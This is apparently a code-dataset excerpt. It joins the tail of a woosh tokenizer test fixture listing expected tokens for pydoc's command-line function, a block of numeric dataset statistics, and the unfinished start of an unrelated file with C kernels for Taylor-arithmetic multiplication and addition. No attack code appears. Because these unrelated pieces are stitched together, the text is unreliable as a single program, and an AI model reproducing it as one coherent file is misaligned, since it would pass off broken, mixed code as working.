woosh.Token(woosh.OP, '(', 2773, 24, 2773, 25),
woosh.Token(woosh.OP, ')', 2773, 25, 2773, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2773, 26, 2774, 0),
woosh.Token(woosh.NAME, 'try', 2775, 4, 2775, 7),
woosh.Token(woosh.OP, ':', 2775, 7, 2775, 8),
woosh.Token(woosh.NEWLINE, '\r\n', 2775, 8, 2776, 0),
woosh.Token(woosh.INDENT, ' ', 2776, 0, 2776, 8),
woosh.Token(woosh.NAME, 'opts', 2776, 8, 2776, 12),
woosh.Token(woosh.OP, ',', 2776, 12, 2776, 13),
woosh.Token(woosh.NAME, 'args', 2776, 14, 2776, 18),
woosh.Token(woosh.OP, '=', 2776, 19, 2776, 20),
woosh.Token(woosh.NAME, 'getopt', 2776, 21, 2776, 27),
woosh.Token(woosh.OP, '.', 2776, 27, 2776, 28),
woosh.Token(woosh.NAME, 'getopt', 2776, 28, 2776, 34),
woosh.Token(woosh.OP, '(', 2776, 34, 2776, 35),
woosh.Token(woosh.NAME, 'sys', 2776, 35, 2776, 38),
woosh.Token(woosh.OP, '.', 2776, 38, 2776, 39),
woosh.Token(woosh.NAME, 'argv', 2776, 39, 2776, 43),
woosh.Token(woosh.OP, '[', 2776, 43, 2776, 44),
woosh.Token(woosh.NUMBER, '1', 2776, 44, 2776, 45),
woosh.Token(woosh.OP, ':', 2776, 45, 2776, 46),
woosh.Token(woosh.OP, ']', 2776, 46, 2776, 47),
woosh.Token(woosh.OP, ',', 2776, 47, 2776, 48),
woosh.Token(woosh.STRING, "'bk:n:p:w'", 2776, 49, 2776, 59),
woosh.Token(woosh.OP, ')', 2776, 59, 2776, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 2776, 60, 2777, 0),
woosh.Token(woosh.NAME, 'writing', 2777, 8, 2777, 15),
woosh.Token(woosh.OP, '=', 2777, 16, 2777, 17),
woosh.Token(woosh.NAME, 'False', 2777, 18, 2777, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 2777, 23, 2778, 0),
woosh.Token(woosh.NAME, 'start_server', 2778, 8, 2778, 20),
woosh.Token(woosh.OP, '=', 2778, 21, 2778, 22),
woosh.Token(woosh.NAME, 'False', 2778, 23, 2778, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2778, 28, 2779, 0),
woosh.Token(woosh.NAME, 'open_browser', 2779, 8, 2779, 20),
woosh.Token(woosh.OP, '=', 2779, 21, 2779, 22),
woosh.Token(woosh.NAME, 'False', 2779, 23, 2779, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2779, 28, 2780, 0),
woosh.Token(woosh.NAME, 'port', 2780, 8, 2780, 12),
woosh.Token(woosh.OP, '=', 2780, 13, 2780, 14),
woosh.Token(woosh.NUMBER, '0', 2780, 15, 2780, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2780, 16, 2781, 0),
woosh.Token(woosh.NAME, 'hostname', 2781, 8, 2781, 16),
woosh.Token(woosh.OP, '=', 2781, 17, 2781, 18),
woosh.Token(woosh.STRING, "'localhost'", 2781, 19, 2781, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2781, 30, 2782, 0),
woosh.Token(woosh.NAME, 'for', 2782, 8, 2782, 11),
woosh.Token(woosh.NAME, 'opt', 2782, 12, 2782, 15),
woosh.Token(woosh.OP, ',', 2782, 15, 2782, 16),
woosh.Token(woosh.NAME, 'val', 2782, 17, 2782, 20),
woosh.Token(woosh.NAME, 'in', 2782, 21, 2782, 23),
woosh.Token(woosh.NAME, 'opts', 2782, 24, 2782, 28),
woosh.Token(woosh.OP, ':', 2782, 28, 2782, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 2782, 29, 2783, 0),
woosh.Token(woosh.INDENT, ' ', 2783, 0, 2783, 12),
woosh.Token(woosh.NAME, 'if', 2783, 12, 2783, 14),
woosh.Token(woosh.NAME, 'opt', 2783, 15, 2783, 18),
woosh.Token(woosh.OP, '==', 2783, 19, 2783, 21),
woosh.Token(woosh.STRING, "'-b'", 2783, 22, 2783, 26),
woosh.Token(woosh.OP, ':', 2783, 26, 2783, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2783, 27, 2784, 0),
woosh.Token(woosh.INDENT, ' ', 2784, 0, 2784, 16),
woosh.Token(woosh.NAME, 'start_server', 2784, 16, 2784, 28),
woosh.Token(woosh.OP, '=', 2784, 29, 2784, 30),
woosh.Token(woosh.NAME, 'True', 2784, 31, 2784, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2784, 35, 2785, 0),
woosh.Token(woosh.NAME, 'open_browser', 2785, 16, 2785, 28),
woosh.Token(woosh.OP, '=', 2785, 29, 2785, 30),
woosh.Token(woosh.NAME, 'True', 2785, 31, 2785, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2785, 35, 2786, 0),
woosh.Token(woosh.DEDENT, ' ', 2786, 0, 2786, 12),
woosh.Token(woosh.NAME, 'if', 2786, 12, 2786, 14),
woosh.Token(woosh.NAME, 'opt', 2786, 15, 2786, 18),
woosh.Token(woosh.OP, '==', 2786, 19, 2786, 21),
woosh.Token(woosh.STRING, "'-k'", 2786, 22, 2786, 26),
woosh.Token(woosh.OP, ':', 2786, 26, 2786, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2786, 27, 2787, 0),
woosh.Token(woosh.INDENT, ' ', 2787, 0, 2787, 16),
woosh.Token(woosh.NAME, 'apropos', 2787, 16, 2787, 23),
woosh.Token(woosh.OP, '(', 2787, 23, 2787, 24),
woosh.Token(woosh.NAME, 'val', 2787, 24, 2787, 27),
woosh.Token(woosh.OP, ')', 2787, 27, 2787, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2787, 28, 2788, 0),
woosh.Token(woosh.NAME, 'return', 2788, 16, 2788, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 2788, 22, 2789, 0),
woosh.Token(woosh.DEDENT, ' ', 2789, 0, 2789, 12),
woosh.Token(woosh.NAME, 'if', 2789, 12, 2789, 14),
woosh.Token(woosh.NAME, 'opt', 2789, 15, 2789, 18),
woosh.Token(woosh.OP, '==', 2789, 19, 2789, 21),
woosh.Token(woosh.STRING, "'-p'", 2789, 22, 2789, 26),
woosh.Token(woosh.OP, ':', 2789, 26, 2789, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2789, 27, 2790, 0),
woosh.Token(woosh.INDENT, ' ', 2790, 0, 2790, 16),
woosh.Token(woosh.NAME, 'start_server', 2790, 16, 2790, 28),
woosh.Token(woosh.OP, '=', 2790, 29, 2790, 30),
woosh.Token(woosh.NAME, 'True', 2790, 31, 2790, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2790, 35, 2791, 0),
woosh.Token(woosh.NAME, 'port', 2791, 16, 2791, 20),
woosh.Token(woosh.OP, '=', 2791, 21, 2791, 22),
woosh.Token(woosh.NAME, 'val', 2791, 23, 2791, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2791, 26, 2792, 0),
woosh.Token(woosh.DEDENT, ' ', 2792, 0, 2792, 12),
woosh.Token(woosh.NAME, 'if', 2792, 12, 2792, 14),
woosh.Token(woosh.NAME, 'opt', 2792, 15, 2792, 18),
woosh.Token(woosh.OP, '==', 2792, 19, 2792, 21),
woosh.Token(woosh.STRING, "'-w'", 2792, 22, 2792, 26),
woosh.Token(woosh.OP, ':', 2792, 26, 2792, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2792, 27, 2793, 0),
woosh.Token(woosh.INDENT, ' ', 2793, 0, 2793, 16),
woosh.Token(woosh.NAME, 'writing', 2793, 16, 2793, 23),
woosh.Token(woosh.OP, '=', 2793, 24, 2793, 25),
woosh.Token(woosh.NAME, 'True', 2793, 26, 2793, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2793, 30, 2794, 0),
woosh.Token(woosh.DEDENT, ' ', 2794, 0, 2794, 12),
woosh.Token(woosh.NAME, 'if', 2794, 12, 2794, 14),
woosh.Token(woosh.NAME, 'opt', 2794, 15, 2794, 18),
woosh.Token(woosh.OP, '==', 2794, 19, 2794, 21),
woosh.Token(woosh.STRING, "'-n'", 2794, 22, 2794, 26),
woosh.Token(woosh.OP, ':', 2794, 26, 2794, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2794, 27, 2795, 0),
woosh.Token(woosh.INDENT, ' ', 2795, 0, 2795, 16),
woosh.Token(woosh.NAME, 'start_server', 2795, 16, 2795, 28),
woosh.Token(woosh.OP, '=', 2795, 29, 2795, 30),
woosh.Token(woosh.NAME, 'True', 2795, 31, 2795, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2795, 35, 2796, 0),
woosh.Token(woosh.NAME, 'hostname', 2796, 16, 2796, 24),
woosh.Token(woosh.OP, '=', 2796, 25, 2796, 26),
woosh.Token(woosh.NAME, 'val', 2796, 27, 2796, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 2796, 30, 2797, 0),
woosh.Token(woosh.DEDENT, ' ', 2798, 0, 2798, 8),
woosh.Token(woosh.DEDENT, '', 2798, 8, 2798, 8),
woosh.Token(woosh.NAME, 'if', 2798, 8, 2798, 10),
woosh.Token(woosh.NAME, 'start_server', 2798, 11, 2798, 23),
woosh.Token(woosh.OP, ':', 2798, 23, 2798, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2798, 24, 2799, 0),
woosh.Token(woosh.INDENT, ' ', 2799, 0, 2799, 12),
woosh.Token(woosh.NAME, 'browse', 2799, 12, 2799, 18),
woosh.Token(woosh.OP, '(', 2799, 18, 2799, 19),
woosh.Token(woosh.NAME, 'port', 2799, 19, 2799, 23),
woosh.Token(woosh.OP, ',', 2799, 23, 2799, 24),
woosh.Token(woosh.NAME, 'hostname', 2799, 25, 2799, 33),
woosh.Token(woosh.OP, '=', 2799, 33, 2799, 34),
woosh.Token(woosh.NAME, 'hostname', 2799, 34, 2799, 42),
woosh.Token(woosh.OP, ',', 2799, 42, 2799, 43),
woosh.Token(woosh.NAME, 'open_browser', 2799, 44, 2799, 56),
woosh.Token(woosh.OP, '=', 2799, 56, 2799, 57),
woosh.Token(woosh.NAME, 'open_browser', 2799, 57, 2799, 69),
woosh.Token(woosh.OP, ')', 2799, 69, 2799, 70),
woosh.Token(woosh.NEWLINE, '\r\n', 2799, 70, 2800, 0),
woosh.Token(woosh.NAME, 'return', 2800, 12, 2800, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 2800, 18, 2801, 0),
woosh.Token(woosh.DEDENT, ' ', 2802, 0, 2802, 8),
woosh.Token(woosh.NAME, 'if', 2802, 8, 2802, 10),
woosh.Token(woosh.NAME, 'not', 2802, 11, 2802, 14),
woosh.Token(woosh.NAME, 'args', 2802, 15, 2802, 19),
woosh.Token(woosh.OP, ':', 2802, 19, 2802, 20),
woosh.Token(woosh.NAME, 'raise', 2802, 21, 2802, 26),
woosh.Token(woosh.NAME, 'BadUsage', 2802, 27, 2802, 35),
woosh.Token(woosh.NEWLINE, '\r\n', 2802, 35, 2803, 0),
woosh.Token(woosh.NAME, 'for', 2803, 8, 2803, 11),
woosh.Token(woosh.NAME, 'arg', 2803, 12, 2803, 15),
woosh.Token(woosh.NAME, 'in', 2803, 16, 2803, 18),
woosh.Token(woosh.NAME, 'args', 2803, 19, 2803, 23),
woosh.Token(woosh.OP, ':', 2803, 23, 2803, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 2803, 24, 2804, 0),
woosh.Token(woosh.INDENT, ' ', 2804, 0, 2804, 12),
woosh.Token(woosh.NAME, 'if', 2804, 12, 2804, 14),
woosh.Token(woosh.NAME, 'ispath', 2804, 15, 2804, 21),
woosh.Token(woosh.OP, '(', 2804, 21, 2804, 22),
woosh.Token(woosh.NAME, 'arg', 2804, 22, 2804, 25),
woosh.Token(woosh.OP, ')', 2804, 25, 2804, 26),
woosh.Token(woosh.NAME, 'and', 2804, 27, 2804, 30),
woosh.Token(woosh.NAME, 'not', 2804, 31, 2804, 34),
woosh.Token(woosh.NAME, 'os', 2804, 35, 2804, 37),
woosh.Token(woosh.OP, '.', 2804, 37, 2804, 38),
woosh.Token(woosh.NAME, 'path', 2804, 38, 2804, 42),
woosh.Token(woosh.OP, '.', 2804, 42, 2804, 43),
woosh.Token(woosh.NAME, 'exists', 2804, 43, 2804, 49),
woosh.Token(woosh.OP, '(', 2804, 49, 2804, 50),
woosh.Token(woosh.NAME, 'arg', 2804, 50, 2804, 53),
woosh.Token(woosh.OP, ')', 2804, 53, 2804, 54),
woosh.Token(woosh.OP, ':', 2804, 54, 2804, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2804, 55, 2805, 0),
woosh.Token(woosh.INDENT, ' ', 2805, 0, 2805, 16),
woosh.Token(woosh.NAME, 'print', 2805, 16, 2805, 21),
woosh.Token(woosh.OP, '(', 2805, 21, 2805, 22),
woosh.Token(woosh.STRING, "'file %r does not exist'", 2805, 22, 2805, 46),
woosh.Token(woosh.OP, '%', 2805, 47, 2805, 48),
woosh.Token(woosh.NAME, 'arg', 2805, 49, 2805, 52),
woosh.Token(woosh.OP, ')', 2805, 52, 2805, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 2805, 53, 2806, 0),
woosh.Token(woosh.NAME, 'break', 2806, 16, 2806, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2806, 21, 2807, 0),
woosh.Token(woosh.DEDENT, ' ', 2807, 0, 2807, 12),
woosh.Token(woosh.NAME, 'try', 2807, 12, 2807, 15),
woosh.Token(woosh.OP, ':', 2807, 15, 2807, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 2807, 16, 2808, 0),
woosh.Token(woosh.INDENT, ' ', 2808, 0, 2808, 16),
woosh.Token(woosh.NAME, 'if', 2808, 16, 2808, 18),
woosh.Token(woosh.NAME, 'ispath', 2808, 19, 2808, 25),
woosh.Token(woosh.OP, '(', 2808, 25, 2808, 26),
woosh.Token(woosh.NAME, 'arg', 2808, 26, 2808, 29),
woosh.Token(woosh.OP, ')', 2808, 29, 2808, 30),
woosh.Token(woosh.NAME, 'and', 2808, 31, 2808, 34),
woosh.Token(woosh.NAME, 'os', 2808, 35, 2808, 37),
woosh.Token(woosh.OP, '.', 2808, 37, 2808, 38),
woosh.Token(woosh.NAME, 'path', 2808, 38, 2808, 42),
woosh.Token(woosh.OP, '.', 2808, 42, 2808, 43),
woosh.Token(woosh.NAME, 'isfile', 2808, 43, 2808, 49),
woosh.Token(woosh.OP, '(', 2808, 49, 2808, 50),
woosh.Token(woosh.NAME, 'arg', 2808, 50, 2808, 53),
woosh.Token(woosh.OP, ')', 2808, 53, 2808, 54),
woosh.Token(woosh.OP, ':', 2808, 54, 2808, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 2808, 55, 2809, 0),
woosh.Token(woosh.INDENT, ' ', 2809, 0, 2809, 20),
woosh.Token(woosh.NAME, 'arg', 2809, 20, 2809, 23),
woosh.Token(woosh.OP, '=', 2809, 24, 2809, 25),
woosh.Token(woosh.NAME, 'importfile', 2809, 26, 2809, 36),
woosh.Token(woosh.OP, '(', 2809, 36, 2809, 37),
woosh.Token(woosh.NAME, 'arg', 2809, 37, 2809, 40),
woosh.Token(woosh.OP, ')', 2809, 40, 2809, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 2809, 41, 2810, 0),
woosh.Token(woosh.DEDENT, ' ', 2810, 0, 2810, 16),
woosh.Token(woosh.NAME, 'if', 2810, 16, 2810, 18),
woosh.Token(woosh.NAME, 'writing', 2810, 19, 2810, 26),
woosh.Token(woosh.OP, ':', 2810, 26, 2810, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 2810, 27, 2811, 0),
woosh.Token(woosh.INDENT, ' ', 2811, 0, 2811, 20),
woosh.Token(woosh.NAME, 'if', 2811, 20, 2811, 22),
woosh.Token(woosh.NAME, 'ispath', 2811, 23, 2811, 29),
woosh.Token(woosh.OP, '(', 2811, 29, 2811, 30),
woosh.Token(woosh.NAME, 'arg', 2811, 30, 2811, 33),
woosh.Token(woosh.OP, ')', 2811, 33, 2811, 34),
woosh.Token(woosh.NAME, 'and', 2811, 35, 2811, 38),
woosh.Token(woosh.NAME, 'os', 2811, 39, 2811, 41),
woosh.Token(woosh.OP, '.', 2811, 41, 2811, 42),
woosh.Token(woosh.NAME, 'path', 2811, 42, 2811, 46),
woosh.Token(woosh.OP, '.', 2811, 46, 2811, 47),
woosh.Token(woosh.NAME, 'isdir', 2811, 47, 2811, 52),
woosh.Token(woosh.OP, '(', 2811, 52, 2811, 53),
woosh.Token(woosh.NAME, 'arg', 2811, 53, 2811, 56),
woosh.Token(woosh.OP, ')', 2811, 56, 2811, 57),
woosh.Token(woosh.OP, ':', 2811, 57, 2811, 58),
woosh.Token(woosh.NEWLINE, '\r\n', 2811, 58, 2812, 0),
woosh.Token(woosh.INDENT, ' ', 2812, 0, 2812, 24),
woosh.Token(woosh.NAME, 'writedocs', 2812, 24, 2812, 33),
woosh.Token(woosh.OP, '(', 2812, 33, 2812, 34),
woosh.Token(woosh.NAME, 'arg', 2812, 34, 2812, 37),
woosh.Token(woosh.OP, ')', 2812, 37, 2812, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 2812, 38, 2813, 0),
woosh.Token(woosh.DEDENT, ' ', 2813, 0, 2813, 20),
woosh.Token(woosh.NAME, 'else', 2813, 20, 2813, 24),
woosh.Token(woosh.OP, ':', 2813, 24, 2813, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 2813, 25, 2814, 0),
woosh.Token(woosh.INDENT, ' ', 2814, 0, 2814, 24),
woosh.Token(woosh.NAME, 'writedoc', 2814, 24, 2814, 32),
woosh.Token(woosh.OP, '(', 2814, 32, 2814, 33),
woosh.Token(woosh.NAME, 'arg', 2814, 33, 2814, 36),
woosh.Token(woosh.OP, ')', 2814, 36, 2814, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 2814, 37, 2815, 0),
woosh.Token(woosh.DEDENT, ' ', 2815, 0, 2815, 16),
woosh.Token(woosh.DEDENT, '', 2815, 16, 2815, 16),
woosh.Token(woosh.NAME, 'else', 2815, 16, 2815, 20),
woosh.Token(woosh.OP, ':', 2815, 20, 2815, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 2815, 21, 2816, 0),
woosh.Token(woosh.INDENT, ' ', 2816, 0, 2816, 20),
woosh.Token(woosh.NAME, 'help', 2816, 20, 2816, 24),
woosh.Token(woosh.OP, '.', 2816, 24, 2816, 25),
woosh.Token(woosh.NAME, 'help', 2816, 25, 2816, 29),
woosh.Token(woosh.OP, '(', 2816, 29, 2816, 30),
woosh.Token(woosh.NAME, 'arg', 2816, 30, 2816, 33),
woosh.Token(woosh.OP, ')', 2816, 33, 2816, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 2816, 34, 2817, 0),
woosh.Token(woosh.DEDENT, ' ', 2817, 0, 2817, 12),
woosh.Token(woosh.DEDENT, '', 2817, 12, 2817, 12),
woosh.Token(woosh.NAME, 'except', 2817, 12, 2817, 18),
woosh.Token(woosh.NAME, 'ErrorDuringImport', 2817, 19, 2817, 36),
woosh.Token(woosh.NAME, 'as', 2817, 37, 2817, 39),
woosh.Token(woosh.NAME, 'value', 2817, 40, 2817, 45),
woosh.Token(woosh.OP, ':', 2817, 45, 2817, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 2817, 46, 2818, 0),
woosh.Token(woosh.INDENT, ' ', 2818, 0, 2818, 16),
woosh.Token(woosh.NAME, 'print', 2818, 16, 2818, 21),
woosh.Token(woosh.OP, '(', 2818, 21, 2818, 22),
woosh.Token(woosh.NAME, 'value', 2818, 22, 2818, 27),
woosh.Token(woosh.OP, ')', 2818, 27, 2818, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 2818, 28, 2819, 0),
woosh.Token(woosh.DEDENT, ' ', 2820, 0, 2820, 4),
woosh.Token(woosh.DEDENT, '', 2820, 4, 2820, 4),
woosh.Token(woosh.DEDENT, '', 2820, 4, 2820, 4),
woosh.Token(woosh.NAME, 'except', 2820, 4, 2820, 10),
woosh.Token(woosh.OP, '(', 2820, 11, 2820, 12),
woosh.Token(woosh.NAME, 'getopt', 2820, 12, 2820, 18),
woosh.Token(woosh.OP, '.', 2820, 18, 2820, 19),
woosh.Token(woosh.NAME, 'error', 2820, 19, 2820, 24),
woosh.Token(woosh.OP, ',', 2820, 24, 2820, 25),
woosh.Token(woosh.NAME, 'BadUsage', 2820, 26, 2820, 34),
woosh.Token(woosh.OP, ')', 2820, 34, 2820, 35),
woosh.Token(woosh.OP, ':', 2820, 35, 2820, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 2820, 36, 2821, 0),
woosh.Token(woosh.INDENT, ' ', 2821, 0, 2821, 8),
woosh.Token(woosh.NAME, 'cmd', 2821, 8, 2821, 11),
woosh.Token(woosh.OP, '=', 2821, 12, 2821, 13),
woosh.Token(woosh.NAME, 'os', 2821, 14, 2821, 16),
woosh.Token(woosh.OP, '.', 2821, 16, 2821, 17),
woosh.Token(woosh.NAME, 'path', 2821, 17, 2821, 21),
woosh.Token(woosh.OP, '.', 2821, 21, 2821, 22),
woosh.Token(woosh.NAME, 'splitext', 2821, 22, 2821, 30),
woosh.Token(woosh.OP, '(', 2821, 30, 2821, 31),
woosh.Token(woosh.NAME, 'os', 2821, 31, 2821, 33),
woosh.Token(woosh.OP, '.', 2821, 33, 2821, 34),
woosh.Token(woosh.NAME, 'path', 2821, 34, 2821, 38),
woosh.Token(woosh.OP, '.', 2821, 38, 2821, 39),
woosh.Token(woosh.NAME, 'basename', 2821, 39, 2821, 47),
woosh.Token(woosh.OP, '(', 2821, 47, 2821, 48),
woosh.Token(woosh.NAME, 'sys', 2821, 48, 2821, 51),
woosh.Token(woosh.OP, '.', 2821, 51, 2821, 52),
woosh.Token(woosh.NAME, 'argv', 2821, 52, 2821, 56),
woosh.Token(woosh.OP, '[', 2821, 56, 2821, 57),
woosh.Token(woosh.NUMBER, '0', 2821, 57, 2821, 58),
woosh.Token(woosh.OP, ']', 2821, 58, 2821, 59),
woosh.Token(woosh.OP, ')', 2821, 59, 2821, 60),
woosh.Token(woosh.OP, ')', 2821, 60, 2821, 61),
woosh.Token(woosh.OP, '[', 2821, 61, 2821, 62),
woosh.Token(woosh.NUMBER, '0', 2821, 62, 2821, 63),
woosh.Token(woosh.OP, ']', 2821, 63, 2821, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 2821, 64, 2822, 0),
woosh.Token(woosh.NAME, 'print', 2822, 8, 2822, 13),
woosh.Token(woosh.OP, '(', 2822, 13, 2822, 14),
woosh.Token(woosh.STRING, '"""pydoc - the Python documentation tool\r\n\r\n{cmd} <name> ...\r\n Show text documentation on something. <name> may be the name of a\r\n Python keyword, topic, function, module, or package, or a dotted\r\n reference to a class or function within a module or module in a\r\n package. If <name> contains a \'{sep}\', it is used as the path to a\r\n Python source file to document. If name is \'keywords\', \'topics\',\r\n or \'modules\', a listing of these things is displayed.\r\n\r\n{cmd} -k <keyword>\r\n Search for a keyword in the synopsis lines of all available modules.\r\n\r\n{cmd} -n <hostname>\r\n Start an HTTP server with the given hostname (default: localhost).\r\n\r\n{cmd} -p <port>\r\n Start an HTTP server on the given port on the local machine. Port\r\n number 0 can be used to get an arbitrary unused port.\r\n\r\n{cmd} -b\r\n Start an HTTP server on an arbitrary unused port and open a Web browser\r\n to interactively browse documentation. This option can be used in\r\n combination with -n and/or -p.\r\n\r\n{cmd} -w <name> ...\r\n Write out the HTML documentation for a module to a file in the current\r\n directory. If <name> contains a \'{sep}\', it is treated as a filename; if\r\n it names a directory, documentation is written for all the contents.\r\n"""', 2822, 14, 2851, 3),
woosh.Token(woosh.OP, '.', 2851, 3, 2851, 4),
woosh.Token(woosh.NAME, 'format', 2851, 4, 2851, 10),
woosh.Token(woosh.OP, '(', 2851, 10, 2851, 11),
woosh.Token(woosh.NAME, 'cmd', 2851, 11, 2851, 14),
woosh.Token(woosh.OP, '=', 2851, 14, 2851, 15),
woosh.Token(woosh.NAME, 'cmd', 2851, 15, 2851, 18),
woosh.Token(woosh.OP, ',', 2851, 18, 2851, 19),
woosh.Token(woosh.NAME, 'sep', 2851, 20, 2851, 23),
woosh.Token(woosh.OP, '=', 2851, 23, 2851, 24),
woosh.Token(woosh.NAME, 'os', 2851, 24, 2851, 26),
woosh.Token(woosh.OP, '.', 2851, 26, 2851, 27),
woosh.Token(woosh.NAME, 'sep', 2851, 27, 2851, 30),
woosh.Token(woosh.OP, ')', 2851, 30, 2851, 31),
woosh.Token(woosh.OP, ')', 2851, 31, 2851, 32),
woosh.Token(woosh.NEWLINE, '\r\n', 2851, 32, 2852, 0),
woosh.Token(woosh.DEDENT, '', 2853, 0, 2853, 0),
woosh.Token(woosh.DEDENT, '', 2853, 0, 2853, 0),
woosh.Token(woosh.NAME, 'if', 2853, 0, 2853, 2),
woosh.Token(woosh.NAME, '__name__', 2853, 3, 2853, 11),
woosh.Token(woosh.OP, '==', 2853, 12, 2853, 14),
woosh.Token(woosh.STRING, "'__main__'", 2853, 15, 2853, 25),
woosh.Token(woosh.OP, ':', 2853, 25, 2853, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 2853, 26, 2854, 0),
woosh.Token(woosh.INDENT, ' ', 2854, 0, 2854, 4),
woosh.Token(woosh.NAME, 'cli', 2854, 4, 2854, 7),
woosh.Token(woosh.OP, '(', 2854, 7, 2854, 8),
woosh.Token(woosh.OP, ')', 2854, 8, 2854, 9),
woosh.Token(woosh.NEWLINE, '\r\n', 2854, 9, 2855, 0),
woosh.Token(woosh.DEDENT, '', 2855, 0, 2855, 0),
woosh.Token(woosh.EOF, '', 2855, 0, 2855, 0),
]
| 52.988853
| 2,077
| 0.6252
| 168,575
| 1,007,795
| 3.730452
| 0.024102
| 0.301975
| 0.452962
| 0.202234
| 0.750174
| 0.323979
| 0.104042
| 0.01927
| 0.015255
| 0.0142
| 0
| 0.237117
| 0.130165
| 1,007,795
| 19,018
| 2,078
| 52.99164
| 0.480258
| 0.000079
| 0
| 0.005156
| 1
| 0.094649
| 0.646608
| 0.268575
| 0
| 0
| 0.000012
| 0
| 0.000368
| 1
| 0.000158
| false
| 0.000894
| 0.005314
| 0.000105
| 0.005577
| 0.000789
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a747ab7116c8759ba34c325a9e1343f7b3b285a7
| 5,298
|
py
|
Python
|
experimental/c_implementations.py
|
arthus701/algopy
|
1e2430f803289bbaed6bbdff6c28f98d7767835c
|
[
"Unlicense"
] | 54
|
2015-03-05T13:38:08.000Z
|
2021-11-29T11:54:48.000Z
|
experimental/c_implementations.py
|
arthus701/algopy
|
1e2430f803289bbaed6bbdff6c28f98d7767835c
|
[
"Unlicense"
] | 7
|
2016-04-06T11:25:00.000Z
|
2020-11-09T13:53:20.000Z
|
experimental/c_implementations.py
|
arthus701/algopy
|
1e2430f803289bbaed6bbdff6c28f98d7767835c
|
[
"Unlicense"
] | 13
|
2015-01-17T17:05:56.000Z
|
2021-08-05T01:13:16.000Z
|
import instant

# In-place Taylor multiplication kernel (adouble.__imul__):
# lhs / lhs_tc are updated in place with the product, where `rhs` is the
# scalar value and `rhs_tc` its truncated Taylor coefficients.  Handles
# 1-D coefficient arrays (Ndim == 1) and 2-D arrays with Ndir directions
# (Ndim == 2).
# NOTE(review): the `rhs_tc[d-1-e-k]` index is asymmetric with the plain
# mul kernel below (`rhs[d-k]`); left untouched — confirm against the
# algopy Taylor-arithmetic definition.
c_code_adouble__imul__ = """
void mul( int tmp_lhs, double *lhs, int Ndim_lhs, int * Dims_lhs, double *lhs_tc, double rhs, int Ndim_rhs, int * Dims_rhs, double *rhs_tc){
    if(Ndim_lhs == 1){
        const int D = Dims_lhs[0];
        const int E = Dims_rhs[0];
        for(int d=D-1; d >= 0; --d){
            lhs_tc[d] *= rhs;
            const int e = (0<=d-E)*(d-E);
            for(int k = e; k < d; ++k){
                lhs_tc[d] += lhs_tc[k] * rhs_tc[d-1-e-k];
            }
            if(d<E){
                lhs_tc[d] += lhs[0] * rhs_tc[d];
            }
        }
        lhs[0]*= rhs;
    }
    else if(Ndim_lhs == 2){
        const int D = Dims_lhs[0];
        const int E = Dims_rhs[0];
        const int Ndir = Dims_lhs[1];
        for(int d=D-1; d >= 0; --d){
            for(int n = 0; n != Ndir; ++n){
                lhs_tc[d*Ndir + n] *= rhs;
            }
            const int e = (0<=d-E)*(d-E);
            for(int k = e; k < d; ++k){
                for(int n = 0; n != Ndir; ++n){
                    lhs_tc[d*Ndir+n] += lhs_tc[k*Ndir + n] * rhs_tc[(d-1-e-k)*Ndir+n];
                }
            }
            if(d<E){
                for(int n = 0; n != Ndir; ++n){
                    lhs_tc[d*Ndir+n] += lhs[0] * rhs_tc[d*Ndir+n];
                }
            }
        }
        lhs[0]*= rhs;
    }
}
"""

# Taylor addition kernel (adouble.__add__): result = lhs + rhs, assuming
# the caller passes a zero-initialised `result` buffer.
c_code_adouble__add__ = """
void add(int Ndim_lhs, int * Dims_lhs, double *lhs, int Ndim_rhs, int * Dims_rhs, double *rhs, int Ndim_result, int * Dims_result, double *result){
    if(Ndim_lhs == 2){
        const int D = Dims_lhs[0];
        const int Ndir = Dims_lhs[1];
        for(int d=0; d != D; ++d){
            for(int n=0; n != Ndir; ++n){
                result[d*Ndir + n] += lhs[d*Ndir+n];
                result[d*Ndir + n] += rhs[d*Ndir+n];
            }
        }
    }
    else{
        const int D = Dims_lhs[0];
